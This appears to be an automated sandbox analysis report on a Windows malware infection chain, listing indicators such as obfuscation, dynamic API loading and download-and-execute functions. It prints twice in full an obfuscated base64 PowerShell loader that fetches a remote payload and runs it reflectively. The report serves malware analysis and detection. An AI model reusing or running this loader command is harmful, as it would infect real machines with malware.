Source:	Binary string: dnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype( source: powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflags source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

8_2_0041D0CF

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573D6F1 push esi; iretd	3_2_0573D6F2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573CE76 push ebp; iretd	3_2_0573CE82
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573DA27 push ebp; iretd	3_2_0573DA2E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573CB51 push esi; iretd	3_2_0573CB52
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_0573DA16 push ebp; iretd	3_2_0573DA22
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_03282AAB pushad ; retf	5_2_03282AB9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_03283EF7 push ebp; ret	5_2_03283EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004570CF push ecx; ret	8_2_004570E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00435226 push ecx; ret	8_2_00435239
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0045D9ED push esi; ret	8_2_0045D9F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00457A00 push eax; ret	8_2_00457A1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10002806 push ecx; ret	8_2_10002819
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00446B75 push ecx; ret	9_2_00446B85
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_00452BB4 push eax; ret	9_2_00452BC1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044DDB0 push eax; ret	9_2_0044DDC4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0044DDB0 push eax; ret	9_2_0044DDEC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044B090 push eax; ret	10_2_0044B0A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_0044B090 push eax; ret	10_2_0044B0CC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00451D34 push eax; ret	10_2_00451D41
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00444E71 push ecx; ret	10_2_00444E81
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00414060 push eax; ret	11_2_00414074
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00414060 push eax; ret	11_2_0041409C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00414039 push ecx; ret	11_2_00414049
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_004164EB push 0000006Ah; retf	11_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00416553 push 0000006Ah; retf	11_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00416555 push 0000006Ah; retf	11_2_004165C4

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Temp\Sheena.vbs

Jump to behavior

Contains functionality to download and launch executables

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_004062E2 ShellExecuteW,URLDownloadToFileW,

8_2_004062E2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

8_2_0041AC43

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

8_2_0041D0CF

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
